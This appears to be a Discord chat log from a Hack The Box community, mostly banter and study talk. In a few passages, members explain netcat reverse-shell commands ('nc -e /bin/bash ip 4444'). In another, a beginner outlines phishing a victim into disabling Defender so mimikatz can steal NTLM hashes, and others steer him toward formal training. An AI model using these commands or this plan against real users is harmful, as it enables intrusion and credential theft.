I'll try

You at least have good attitude. Hopefully knowledge will come with time

All we want is for folks to understand how technology works and how it can be better

Cuz that's all cybersecurity is about

i want monez

I want to look cool and argue with people

the more right I am the more value I have

I want to just stay in some corner

I mean why wouldnt I?

Im not here to beef I'm literally a teammate

A what

Are u hopping teams that quickly?

eeww teemmates

What am I an outsider or sum?

this is cybersecurity, everyone needs to be solo rockstars that are better than everyone else

Daddy ipp said otherwise

Na I'm playing 💀

you mean the guy that is a solo rockstar that is better than everyone else? he would say that

classic solo rockstar behavior to say teamwork is good

Huh?

Are we both talking about ippsec?

dont worry im operating at a higher level of existence than you

(im just fucking around before we leave this cafe for the goth market)

Of course goth '

gf did my nails

"how could this have happened"

Guys

You publicly exposed rdp

I genuinely don't know what to tell you

some people love exposing themselves

i see 2 hands from one person

yes?

Tbh out of all community contributors I've met C1oud is probably my favourite

most people have two hands

Both helpful and random fun facts

true

Well thank ya

I pride myself on my random fun facts

golam are you intoxicated

Na man dont thank me

U earned it

no

True

why not?

sup twin

Ayo

cause water is the only drink you need

"dude why arent you intoxicated"

lmao

Prepping for interview tomorrow

N u?

trying to figure out why deployment failed 😔

Read the logs

now gotta add logging to code and go to heroku dashboard

DNS

but dashboard hangs in 8 seconds

so thats the limit

Aha

if i take 9 seconds i will neevr find out what the issue

is

I quit heroku 2 years ago when their free tier vanished

wish me luck

peak decision

Good luck

https://tenor.com/b07T7.gif

hi

https://cdn.discordapp.com/attachments/937458831267594290/1482431318997602304/B0E23A98-D0D9-4BAF-8058-EEAF5F6D564F.mov?ex=69b83ec0&is=69b6ed40&hm=8736add1fe71363563e970bc87f674677e9226adbf8b8d236e0000ae23d97900&

i think i should pickup smoking cigarettes and blowing the smoke into my computer so the resources chill out

.. you wanna walk us through the logic on that or nah

Do not even touch it for fun

ur right thats just silly. ill keep my computer healthy and just clean it with water instead

ill take a shower with my lappytop[

shadow ive been seeing ppl root ur machine on lnked in

I lick my 5070 clean every night

why is it dirty tho

😉

it's been busy churning data

Dudes claude is actually a dope ass mentor ngl

It taught me netcat from metasploitable2

Introspective ahh zawg

Test

Yerp

To they was odd

The discord unlinked my account without warning

And made me reconnect

I couldn’t see anything for a while on here

Also now I guess I have two HTB season medals lol

Silver and ruby

What du heck is going on with my profile

anyone understand radius server and can explain me it pls?

How would I get access to the student plan?

Gng just ask support

Serene as buddha

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

No hints are allowed for the duration of the event. Once the event is over, feel free to share solutions.

Dudes I learned how to reverse shell thanks to claude

nc -lvnp 4444

Just installed my Uniden R8w 😎

You can also just go to revshells.com or do nc --help

thx vro

but how does nc -e /bin/bash ip 4444 work tho

I dont get it

Do I have to write it everywhere when I do reverse shell?

Let's break down the command

https://tenor.com/view/raygun-raygunn-raygun-breakdance-raygun-breakdancing-breakdance-raygun-gif-3035521202497175510

nc -e is basically netcat filename

You invoke the netcat binary with the dash e flag, specify the shell you wanna use, specify your IP and port

And then it sits a listener on that port

So if someone tries to contact that port

It'll be met with

A bash shell

but why /bin/bash?

Because that's where bash is

Its in the directory /bin/

Which is short for Binary

Cuz that's where binaries go

it tells your terminal that when you run the script it should use bash to execute it.
huh? 💀

I would really love you to not use AI instead of your head haha

OHHHHHHHHH

/bin/bash is literally just the shell programThink of it like this:/bin/bash = the thing that reads your commands and runs themWhen you type whoami, ls, cat etc — it's bash that understands and executes those commands. Bash is the interpreter 🧠

Imagine robert downey junior sayin

Netcat execute bash from bin on ip 1.1.1.1 and port 4444 for me

Ok I see your sneaky ass

lmfao

What did I just tell you

https://tenor.com/view/periodicazo-fifidonia-newspaper-gif-20050186

Claude is my bestie

Na but fr

Fascinating 💀

Using the command folder against itself.. if I understand correctly 💀

💀💀

That's not true at all bro

Am I saying bs?

HAHAHAHAHAHA

Yes

Na bro Im cooked

How

When you're using commands

On the command line

In Linux

You are using bash

from the bin folder

ye

Obviously

It is a "shell" the thing that lets you interact with the OS

Ohhhhh

That's where reverse shell name comes from

Not quite

When you form a shell

oh

🔫

You interact with computer

When a reverse shell is formed

The computer reaches out to YOU

True true

basically like knocking on the door

It's knocking on the door vs yelling for someone inside to open it

HAHADHAHDSAIDHASJD

That's what a reverse shell is

sorry

The computer is somehow forced to reach out to your host for a connection

Which is why you set a netcat listener

I thought a reverse shell was essentially using a vulnerability to execute commands on another system

To grab that connection

That's remote code execution

Dude that's actually dope and kinda scary

That's why shawty claude says there
Firewalls usually block people calling IN to a server — but they almost never block the server calling OUT. So we trick the server into calling US

DAYUM

cold

I would love for you to stop talking to Claude like it's a professional in the field

I literally do this for a living and I'm explaining things to you

So is a reverse shell basically imitating something which the computer will request to

but u aint here 24/7 nor forced to hear my yapping

But u a good master I gotta give you that

A reverse shell is formed when you make the computer reach out to your host for a connection

You have to have RCE beforehand

You have to be able to influence the remote computer into making that request back to you

Once the reverse shell is established it's a way of remotely controlling the host that isn't directly limited to what you can do with the vulnerability

I also don't drain fuck tons of electricity to do so lmao

So to reverse shell those are the only two commands?

What? No

Can a reverse shell happen via remote execution to then call out to the attacker machine

Aw man

That's how you set up a listener lol

I thought it would be easy

Yes that's how it works

Na dude how many years are you studying cyber?

6 so far

...

makes sense

lmao

Damn that’s a lot of years

I have like 5 months

That's why you speak like you know your shit bro

I just try to help people

Confidently

I'm wrong sometimes

It's okay to be wrong

who isnt 💀

It’s impossible not to get things wrong in cyber

And let me tell you that you're succeeding alright 💀

And I cant tell you how grateful I am

You're welcome dude lol, I just want people to succeed and understand things better

Are you exclusively web security or a bit of everything

... Web?

hi how is everyone?

I have never mentioned web once haha

I just did a CWES section

Network then I get them confused

I'm a blue teamer, I focus on defense 🙂

gonna do another in like ten minutes after I give my brain a short break.

ya

And u know offense too?

Na u purple

Thanos

It's important to understand offense

I mean yee defense without offense is being blind

It works vice versa

Recto verso

agreed

ya totally

How the fuck do you guys remember all that?

Im looking at tactics bro and I forget each immediately as soon as I read the other one

I have to take notes this is too much

Easy

I've been reading about it for years

It's just practice

Do u really remember all tactics tho?

This shit is worse than med and law school

Talking about MITRE??

Na about reverse shells and netcat

reverse shell is worse than med/law school

But I have MITRE on my bookmarks

does anyone actually follow mitre as a playbook? it feels like its mostly just a way to describe tactics after the fact

Nah I use it for after the fact explanations

You say this like I know how to read this

it was a question for the room

Yee i know

Im just telling you my side 💀

btw someone suggested me this too https://digi.ninja/projects/zonetransferme.php

💀

so I did ask it as if the people reading it knew how to read it

Offence has been taken

Idk how to say it without sounding rude lmao

I DID SOC for some time
And it's really interesting.

But the thing it has (yeah it's for easier documentation/communication/etc), is soo pretentious.

Probably cuz the way I got introduced to it

Is it?

Just by looking at it no offense to the blue team people but SOC looks kinda boring 💀

Just waiting for an emergency and you also have night time shifts

Iirc your name was sherlock? Or something similar?

cuz of dfir lol

not soc

Yall I just got a message from the recruiter from Accucenture

if i have any question ask here ?

They want to talk

good luck

well not any question

Well i didn't work in soc as a soc guy with single job role

I had full access to SOC so i could see what's happening and investigate stuff and all

Haven't got any security related true positives, but you still get to see why it triggers, from where and u go into that system and see what is doing it eetc.

I'm pretty sure in "proper" organisation it's not what l1 can do

Does anyone wanna rate some .docx that I found about beginner pentesting? lmao

about nmap module

#modules

thanks

sounds like a scam

Not really

Idk you judge... I'll post it somewhere

#red-team

You cry about ncat and reading "how to become a pentester in 15 days.docx"???

is uploading a docx even allowed lmao

he did

It's a word bro 💀

I dont even know how to make a virus

brother its a docx

one of the most frequently malicious file types out there

https://giphy.com/gifs/foxtv-fox-bird-family-guy-JLMW4MIBVrVbn1mrVE

what about it? 🥀

docx are malicious?

tf?

first time hearing it

💀

Start with eating bats ig

Anyway can someone just tell me if the notes are well writen? 💀

or if you are scared tell me how to transfer the notes on another file or whatever?

It is bad, now what 👁️👁️

Is it?

Idk man, in on phone

I'm asking, what will change with yes/no

I just want an opinion vro

If I should study it or if its a waste of time

my opinion is dont get pentesting advice from docx files

It's not the best, focuses on certain tools but other than that it's okay

for example i use ffuf for web fuzzing

instead of gobuster

there is also dirbuster

Yee that's what Im aiming for cuz my only weakness is tools

so you see the piont

yee

Just pick any and start using it

Thankfully I installed metasploitable too

my good ol sandbox

dont fuss with tools, learn method and then learn what tools makes those methods easier instead

for tools

lol

bro now I caught the joke 😭

That's gotta be racist-

why would it be

All my VMs

nice

I have permissions 💪

need whonix vms

holy bro 💀

and commando

What u want all those for '

do you work in cyber security?

How powerful is your fucking pc my guy-

5800X, 8 core 16 thread, 64GB RAM, RTX 3060 12GB, phantom 4 asrock motherboard

what kind of ram?

DDR5?

ddr4

And I was gonna call you a millionaire lmao

I built the PC like 4 years ago

it's a bit dated

64gb ram is so nice when running VMs

What OS?

Kubuntu 22.04

being able to just toss 32GB to a kali vm is freeing

Bruh I was gonna upgrade to 94gb kit but then the damn prices skyrocketed

stuck with 32 for a while

Kubuntu?

feels bad

Isnt that light?

Ubuntu with a k?

KDE

the opposite of light lol

kde notoriously heavy

I heard kubuntu is light unlike ubuntu

I use Xmonad as my WM and KDE apps underneath

HUH?

I thought the opposite LMFAO

crazy

Which DE are light?

I know I3 is light

what else

i3 is a wm, not a de

oh

de's are basically inherently heavy

i3 my beloved

I prefer Xmonad

favorite wm

very dry...

I would have hyprland but it's very fragile

personally I dont actually care if my environment is heavy or not. Thats what my ram and disk storage is for

Wdym by dry?

not wet?

Kinda like using windows XP

Not very fun to use

windows xp was a blast to use back when it was new

I mean it's very light but its very boring

Yeah but it's not usable now lol

Windows XP was the shit

back then yee

facts

xp was the last windows os that just let you do shit

horribly insecure

horribly horribly insecure

but fun

Go to login -> provide username and password? -> click cancel instead on login prompt -> auto signed in as administrator

It's great after some customising imo

I want to look into ricing login screens a little better tho

not sure how

I mean forsho you know better than me cuz I never used it seriously.. Im speaking from my little experience 😅

But if its interesting after some customisation then I'll give it a try

Hi

I got into it after I was supposed to setup an arch computer but I forgot my mouse

and it doesn't require a mouse to use

happy accident

Yee I was aware about the mouse shit and it felt so weirdddd

But at the same time very tech savvy

For me it was just because I'm lazy

and started because I have bad memory 💀

XP was the last time it felt like a windows was a friend and not an enemy

real 💀

Windows installed linkedin on my laptop without me knowing

Maybe that's a sign

Mmmmhmmm

I have too much going on to get a job

in the summer before uni maybe

How to connect discord with htb labs

Hi everyone I am Abdias, new to the community. I have a questions. I am currently completing Setting Up Module and I am experiencing an issue at section 4 Linux whilst trying to set up a VM. I download the Parrot OS Security version which was recommended and after I install it on the VirtualBox I encounter an error message stating failed and I am unable to login

Kindly asking for someone to assist me?

https://letmegooglethat.com/?q=How+to+connect+discord+with+htb+labs

#how-to-talk

Is it not already connected if you're sending messages?

no, white name is unconnected

Oh it didn't give me permission to talk until I did that lol

some channels dont need it like this one(unfortunately)

What's the error?

Also should you use a VM for pentesting or just for uh whatsitcalled

analysis

stuff

It says failed and takes me back to TryInstall again basically back to square one

Now, I have

Well, still noob

gj

Cpts is a cool cert

I'm gonna go for it

Just says failed?

no error logs?

yes and error logs but it appears quick and disappears again bringing me back to the TryInstall page

It should have a log file

Do you know if it is VirtualBox that's failing or the OS?

are you installing from an iso onto a vm or importing the vm?

I am new to this world so I honestly, I know the VM is working. I think its the ISO.

if youre using the iso I would abandon it and import the premade vm image instead(the ova option if youre using virtualbox) it tends to be smoother but dont forget to give it some cpu, ram, and storage

Guys Unrestricted file upload that leads to Stored XSS, its high severity?

yo can ms-sql get changed to filtered from a -A nmap scan, per machine eighteen?

time to install arch

again

i accidentally dropped water all over my desktop gg

h

Htb

i am still not winning

i tried downloading the iso file again from parrotsec web page but i still get an error message

Probably misreading this conversation but I don't think I've ever said anything along the lines of calling myself a rockstar, especially a solo one. I think its pretty well known i converse with the community/freinds/etc quite often to learn, heck I even cheated the invite code to get on the site back in the day.

You didn't refuse the other guy's "daddy ipp" message

https://tenor.com/jimq743kSPD.gif

Tell me what is missing

hey ippsec

Yeah no worries I was just joking around. Youre a solid one.

ohh yeah you said that in codeparttwo I think the old HTB site server

can anyone help me to decompile obfuscated luau code

Random rain when i decided to wear a thin T outside

#1024429874246590575

ty also sorry if i did smth wrong

tahts so relatable

nah just post in the relavant channel, it will prob get lost along the constant lines of text

#binex-rev might work too

What a handsome devil

😼

What a great full cat

what do you mean by 'issues with module completion'?

Sometimes when you complete a module it doesn't

hey has anyone dont machine eighteen lately?

May I ask something I have CPTS can I find a job with it ??????

I don't think a cert alone will get you a job, but it can help

@exotic pendant have you tried Mr. Hyde signature preworkout?

What the employee see first is it the skills ???

like sending the labs I've solved, and thank you for responding

There is no one thing that will get you a job. If the hiring manager knows anything about certs int he industry then you will stand out. That alone won't get you a job. You need to be the whole package. Sending your projects or experience can be good, but often times you need to get through the HR gatekeeper. I think a pentesting firm who knows their stuff would get you at least an interview if you had a CPTS cert (I got an interview with it and was able to pass their webapp challenge.) I still didn't get the job though so it's hard.

NOTHING will get you a job right now

fake news

I have a job and want a different job

Somebody else can have mine lol

i have a job and i'm interviewing for another one, take my job too

I'll take it

Give me

Clead can wait

I need a j*b so I can buy alcohol, supplements, and gamble

Clead-us

anyone having issues with the HTB academy VPN?

Im in the Windows PrivEsc Skills Assessment, connect fine to the VPN, though cannot ping any of the targets or do anything. I've tried different VPN regions, tried TCP, respawned the target, rebooted my machine, with no luck.

Then you probably ain't connect-ed

I had my first session of D&D irl today at the game store. It was fun. A little slow. But our DM is old school gamer from like the 80s. He owned a game store and has a lot of lore.

i want to play i should go to my local one

but then again, busy with other shit

yeah adulting cuts into game time. We were supposed to have 4 players and 2 of them are working. So DM set a Level 3 cap that if we make it there without them they get dropped. At the rate we're going though I don't think that will be an issue.

guys what if vpn protocols gonna be banned in my country, how am i gonna be able to access htb labs

Pwn box

is there any way to restore the old UI for HTB academy? i m not fond of the new UI.

is it fast at cracking passwords and bruteforcing ?

The modules are designed to not waste time cracking and such. Nothing will take you more than 30 mins or so.

They don't want to waste people's time doing stuff like that.

if they ban the protocols theres no way u can use a vpn

Just smuggle a starlink

xD

Would anyone happen to know what the policy is on publicly posting reports of active Sherlock boxes assuming answers and direct paths are excluded

I was told not unfortunately

I prefer the old one too!

https://tenor.com/view/hi-dog-gif-9693408977083628631

HTB age verification when

hi everyone

so i am a beginner of htb and am into red teaming

daring today

i learnt the very basics within one month and have only solved spookypass,meow etc etc.

ask in the proper channel for that box

looks like box spoilers man, you should probably delete it

wait hi

i had a question

can mimikatz be used for obtaining windows ntlm hashes

For instance, a hacker sends a file with mimikatz embedded to the victim and before than instructs a naive victim that the file is critical and disable miscrosoft defender to run it

after the ntlm hash is obtained,

can it be cracked using john the ripper

are u tech support

nope

am a beginner learning just one month into it

thats what tech support would say

so can mimikatz be used in this way to gain the ntlm hash

which then can be cracked using john the ripper

on kali linux

nope computertrash i am not tech support

it sure can

okay

but as a beginner i am a bit confused

embedding mimikatz generally isnt the way to go for the scenario you described though

it probably won't just magically obtain ntlm hash ig it obtains from lsass memory process or something

well basically the scenario is

X hacker sends an email to victim as fake microsof telling some bug or smthing and convinving him to disable defended and then he clicks on a link with mimikatz embedded it runs and obtains an sends ntlm hash to attacker

cause if you can get your target to run your stuff its better to have it be a loader that pulls down something more feature complete as necessary, in which mimikatz or similar tactic would be employed as a module if needed.

This is ofc ignoring things like opsec and edr

so

what conclusion we reached

and the tool with mimikatz embedded in it can it be like i can make html file with this js script

with mimikatz embeded

also stealing ntlm hash is often inefficient when youve already successfully tricked a target, why not just steal existing credentials or keylog instead?

no youre not embedding mimikatz in javascript lol

oh sorry

i got confused ig

yes

thats a better technique

so we can design a code and use social engineering and that victim will be tricked and we can have root access

mimikatz is more useful in a windows domain network scenario where youve possibly compromised various workstations and servers with other methods

okay

what I think you actually want to explore based on what youre fixating on is C2 frameworks and phishing strategies(include evilnginx, maldocs, etc)

so basically can you describe a scenario from scratch skipping the social engineering part and how does the code need to get embedded to compromise a windows system

but windows defender needs to be disabled first

mimikatz is cool, but incredibly unstealthy and youre treating it like a hammer when its more of a very specific socket wrench size

morning

naive users can be tricked

oh okay

so we need a better method

brother Im not an llm I cant give an entire class on that while lying down in bed on my phone. You have to do some thinking yourself lol

guys
anyone here got a writeup blog about htb or cybersecurity in general? trying to get insparation

okay lol

but i have an idea taking the mimikatz can we modify code to make it stealthy

we can try

https://tenor.com/view/monday-mondays-roll-hit-gif-13049594

you can try, but if it was possible, it would have already been done

yeah i was thinking about that

I mean people DO make stealthy mimikatz versions all the time

well i realise it is a post exploitation techinique

though some aspects are impossible to make stealthy like touching lsass

yesh

but i have a question

depending on if your goal is just getting passed defender or EDR

how is windows compromised

through social engineering ?

might as well ask 'how to hack'

or some techical method ?

wdym?

way too broad of a question

theres entire fields and subfields dedicated to what you asked

wait

answering that question comprehensively is like 15 years of hacking experience lmao

i am not even 15y/o lol

neither am I

and ig one can send a download file with some code in it to download

and that code can then escalate permissions

and gain admin access

I recommend checking out htb academy and doing the cpts course if youre wanting to learn fundementals

thats not windows compromise

then mimikatz may be used

if that is rooted it can be

well a rootkit

youre way too obsessed about mimikatz lol

wait how is a rootkit developed

ur hacking a human lol

the weakest link in a system is human

ye

but that isn’t windows compromise

another entire field called maldev

yoo

well i am obsessed with it because actually i have developed this workflow like

social engineering --- system compromise --run mimikatz ---get password ntlm hash ---crack with john the ripper

thats not gonna work in most of the times

the social engineering part works on a naive user

nah

It depends how good the hacker is too

and how much they know

DonutMaster123 [ARGS], Role icon, HTB Seasons: Ruby — 12:00 PM
thats not gonna work in most of the times thats what i think thats why i came here to enhance this workflow

there’s not gonna be one workflow

the way u get in depends on the scenario

okay

lets assume there is some victim naive user

so how is that windows compromised theoretically'

its not

its system and human compromise

yes

the human compromise part ik

i am here to learn the system compromise part

that would depend on the scenario

how useful is swift?

k

u get in, maybe ur admin automatically, maybe ur user has tons of permissions

yup

depends on the permission of the user

but in a network, and u want to move to another user or privilege escalate, again, differs

yes

Atomic Red Team (redcanaryco/atomic-red-team)

could this github repo be of any use

(not mine)

send link please

https://github.com/redcanaryco/atomic-red-team

it can be useful, but u still need ur own skills

okay

see suppose

i have a network lets day 129.23.1.0

okay

and i run nmap -sS -p- -Pn -sv --min-rate 3000 --stats-every 5s 129.23.1.0 will it show like all the devices connected and open ports or do we need to add something

I think it’ll only show the ports, but that’s also only a network
I’m not entirely sure, ask an llm

okay

apparently we need to specify the range

yes

and then with open ports we need host discovery

then the devices on the network can be compromised

apparently we can use -sn

or -sl

if we want lists

yes

okay

I would recommend to just go learn

tryhackme, hackthebox

the way you ask questions like youre talking to an AI/LLM is pretty weird tbh

just go learn first lol

yes do this

brush up some fundementals

okay

dont be too eager

k

easy way to accidentally end up in jail even without malicious intentions lol

okay

let me go and learn pentesting in htb academy tmrw

i am way too eager to learn fast ig

go learn the fundamentals first tbh

k

learning fast is fine. but its clear that you get an idea and chase it before youve understood the basics first and its a good way to develop tunnel vision and bad habits that will screw you over at some point

k

ok, thanks for the advice

Hi

hello tejas

how is u?

I'm ok, lookin for cool new terminal emulators for linux rn. How about you?

st

Why tho 😩

why not. Kitty is too mainstream

Bro is the niche enjoyer

yeah I've looked at that one before but got stuck on themeing lol

yes

whyyyyyyyyyyyyyyyyyy

because I need my rice to be gud

I waited for your reply and slept.

I piss between 2 people while they are having a conversation (man in the middle attack)

weird kink

pissword spraying

Password Spraying leaves traces behind, asking people does not...

slept for 1.5 hours?

1 hour

lol

It was a good sleep ngl

woke and took shower

💪

mitochondria is the powerhouse of the cell

https://klipy.com/gifs/skeletor-until-we-meet-again-he-man

what does hackthebox student plan 8$/month , included??

tier 0 to tier 2 modules for free

u also earn the cubes that those modules reward

❤️

Imma change the fun fact of the day. The membrane in a pepper is where it's the spiciest

https://klipy.com/gifs/skeletor-until-we-meet-again-he-man

dodgin feds smokin weed cause my head hard

Maybe someone can explain the difference between a "100% completed" module and a "Completed" module!
Seriously, please bring back the old HTB Academy interface!

screenshots plz

Is it true that for the MIC calculation in WPA, all fields in the EAPOL frame are filled except for the MIC field, which is set to 0, and then the KCK (Key Confirmation Key) is used with HMAC to calculate a value that is finally inserted into the MIC field?

Guys my wife left me how do I fix that

they can’t send any, no?

I tried the old academy UI a bit, but imo, the new one is better

A

Ugh, idk. I can't tell that for sure. There are some hiccups in the new UI. For instance, when I click on show solutions, it doesn't auto-scroll to that question.

Images seem small, I wish there was preview

When I right click view images it downloads which I don't want it to happen.

Also, I hate Pwnbox preview on the page. They could have removed it. Some features are missing such as the terminal and streaks. Or maybe streaks are, there and I didn't notice. streaks are there,

DM

the square macOs borders are back

look how ugly this is

idk i'm a fan of the rounded edges but that's just me being weird

its gotten so bad that if you using a external monitor it. was eating your edges

eating edges? isn't that what chrome and other browsers are for (this is a shitty joke about microsoft)

like this

oh, that's gross

there should be a context-aware screening that knows if it's docked so it can snap to corners

worth the pricepoint?

found a opensource project that helped with this called "apple-sharoener", now its back being cool again

I like rounded too.

floating panes are fine rounded, docked panes should have snapping on the screen edges/corners

Just a friendly reminder to enable Airplane Mode if you don't want to talk to someone on the phone. They will hear "call failed" and think you lost service

i know some people using mac would like this tweak

mto applying tactics to evade calls from @green kite

where's @green kite

Not @green kite but recruiters

damn three pings

and uncle rayan ?

who's rayan?

https://giphy.com/gifs/phone-cell-dog-dtBi0s3hndz7q

rayan dees

r4yan

the shadow pinger

wasaaaap sparkliing

not much 🙂 jsut busy with work, how are you?

Good so far

great, packed with work this ramadan

bought some cwee modules but cant do any rn

nice one, you will get to them soon 🙂

caffeine crash hits in ramadan

ooooo

I bought academy student plan

thank you for this life hack

it unlocks t3 modules ?

nope

only until t2

there's lot of t2 moduels i wanna do too but can never get enough

Why did u choose CWEE instead of CAPE

Are u a web pentester

I wanna get t3 modules, but they expensive

no i just think i lack in web, there for wanna prove i can do it

Hey, is there a "CWES list" just like "TJ Null OSCP list"?

yeah man 500 is a lot for me too, cwee would do some damage to my pockets, but still a better deal than offsec, man my OSCP did nothing for me lMAO

Not currently, especially since the goal of boxes differs from the goal of CWES

lol

For prep I would do the burp academy

I’ll get t3 when I make my own money

So if I wanted to practice my skills before exam, how can I?

CWES goals more closely align with web challenges than they do full blown boxes

Yes, I understand that.

understand modules what they tried to teach you ?, like make a checklist, what this module wanted me to find and to think, and apply that

that what worked for me

I've made notes along the way.

they comes in handy

just like you said, and they are pretty neat.

alright, thanks. here we go with the exam.

dont overthink it, its just an exam, if you failed you learned what you're lacking

if you get stuck, you know you're about to learn something new

you got this

i have to think when it involves money, haha.

money comes and go buddy

unless you're paying 1766$ for a fking exam

more goes than comes

get cwes -> show it to founder -> ask for increment -> happy

I wish my challenge gets accepted

then finances are wrong

I’m a child, my finances are always wrong

Here is my crypto wallet to secure it

one apple product purchase is enough to break your finances.

Hey @tame gust are u a pentester now

no, and i dont think i'd work in pentest

red team?

kinda became lame ...

i love what im doing now, but if i'd have to do something next, would be appsec maybe ?

https://www.hackthebox.com/u/YourName

how to get a clean profile url like this , ???????

Yeah, it's lame when you realize everyone just hoarding TTPs cos they don't wanna burn their secrets

I agree. I've only ever worked in more education side when I did cyber outreach for like 10 months and it was very misleading and over hyped

Shit like "you can get this degree and hangout here and get 6 figures working as a super secret shadow government haxxor"

Cleanest one you can get is from: https://profile.hackthebox.com

it gives uuid at the end , not my username 🙁

gotta make your profile public and then you can get a share link

https://profile.hackthebox.com/profile/019cf607-6642-736c-b79d-7afb41e94eb8

Yeah nothing cleaner than that unless you use a url shortener or something

❤️

a wise man once said:

haha yeah

that was a fun one

It isn't if you're connected to a server half-way across the world

true

np sir

Merry christmas

Hi guys

I can't seem to find the VPN download link in academy 2.0

Does anyone have an idea on where it's located? Spent almost 45 mins looking for it

Some of them don't need the VPN iirc

Understood, thanks

Supp chat

Hi chat

Wassup echoes

Hangover + lack of sleep + didn't take my pills + fasting

Hangover?? Drink some water with chia seeds vro

Bro wdym chia seeds

What you think I am a bird

Ever seen those chia pet commercials? You can buy chia seeds and put them into some water for 15-20 minutes and then drink them

Very high in fiber and healthy omegas

They'll help with your hangover 😉

I can't obtain chia seeds any soon

And I drink like once a year or so

I just got a few beers tho I'm not really hangover

Is more the other things

How many is a few?

🍃 ?

5 or 6

Can't do that

Happy Friday!

Oh. I thought that's what you meant when you said other things lol. If you're hungover weed won't make it any better lol

Damn.

I can't do weed my brain would turn against me

Other things lack of sleep and adhd pills mostly

How are yall

I woke up alive...

That sounds good enough

Oof. I really shouldn't be doing it either tbh or seriously lower the dosage. I get the nastiest hangovers from it

On a Monday that's good enough for me

Lmao

Weed is no bueno

Alcohol tho is fine unless I drink like a sailor or have like 6 or so in the span of 5 or 6 hours lol then I get messed up

Very understandable

2 weeks ago I had a bunch and almost got sick and was fading in and out of consciousness probably won't do again for a while altho Tuesday is Saint Patrick's Day

Btw, idk if I should bother you with it.😅 but is there any way u know how to get student subscription? I have connected my student mail as secondary one

No idea where to verify it or what to so next tho

Unfortunately, I cannot help with anything that is not Discord related

Okeyy

Thanks

Please reach out to support on the main platform.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Almost a decade ago 👴 I noticed weed would make me unable to achieve anything useful in this life

And ping @sturdy thistle

and don't forget to ping @austere sinew

@austere sinew GET PINGED TO THE CORE

@austere sinew health check

Hey @supple plume DM open for specific question?

Sure yeah

manager: hey man we need those fortigates done in 2days, Me: yeah but i just got em today and you're asking now to have your tunnels over orchesters and use BGP's ...etc, manager: we really need it rushed. (Gets done in 2 days): 2 months later somethings breaks or doesnt functions as it should, ** Manager Shocked **

Hey dude what resources did u use to learn how to do that

I have 0 firewall stuff knowledge

fortinet Docs, mostly

https://docs.fortinet.com/

and you must listen to Metalica while at it

You can ask here too if you want, but send dm anytime. Although I'm not very knowledgeable about anything but web stuff

Lol. Growing up it was fairly normalized as a thing I think but now that I've done it a few times I'm like "what was all the hype about?"

It's not about hacking its about something u mentioned

Ok, ask then

I pretty much become a baked potato every time I do it

my last 2 brain cells trynna configure this BGP

One time I was high and had dinner with my family and no one other than my mom knew and my little brother was making jokes about me being high and it was the funniest thing ever

can you regenerate brain cells

You should configure bgp on kubernetes

Brain cells are precious, don't use them

no thanks,

no hell no

No just sniff more markers to give the non dead ones super powers (don't do it)

roger

the process of one unstupidifying themselves is part of one's evolution

i just said some beautiful shyt

@terse dirge https://geohot.github.io//blog/jekyll/update/2026/03/16/polynomial-time-factoring.html

You can also look at my bio 😉

https://tenor.com/view/bat-signal-batman-keaton-batman-keaton-bat-get-online-gif-8188089525554648501

I'm not that Batman, but close

mtoman

I will leak your Discord name if you keep this up mkay

pls no

my discord name is @austere sinew

I knew it...

Hi, why is there not a button to change theme in HTB academy web site?

The academy is not made to be read during office hours - during the day - as sun or just general light makes it hard to study and use the platform.

I tried adding Stylus plugin to Firefox and messing with CSS, but it is not a fix or a good solution.

guys how can i unlock VC

generally speaking darker colours are better for spending longer time reading as it doesn't create as much stress on the eyes. There hasn't been an official 'lightmode' toggle, but there's been plenty of plugins/workarounds

as far as if you'd like that to be a feature implemented: use /feedback in the discord

I can propose a feature for that. Thanks for pointing me in the right direction!

For everyone, please press enter after using "/feedback" if not your long text will disappear.

i know some people who have made a userscript

to my testing it works well

wdym ?

@sturdy thistle @supple plume @cerulean bloom @meager kernel get pinged back

WHAT

here is how it looks

#community-content message

ofc there are some bugs here and there but it gets the job done somewhat

Any hacking today?

only academy

you?

None

sadge

always

Chasing down 2 leads this morning. 1 may result in RCE

hi

i have a script

for recon

and all

can anyone review it

note:- not to be used against real websites

post the github link with some context and maybe someone will look at it

how did you find initial

i dont even know how to find leads tbh i just look around

pokin' and chokin'

https://hastebin.com/share/kivupugumi.swift

hruuuuuuuu

this is hastebin link

need to finalise before uploading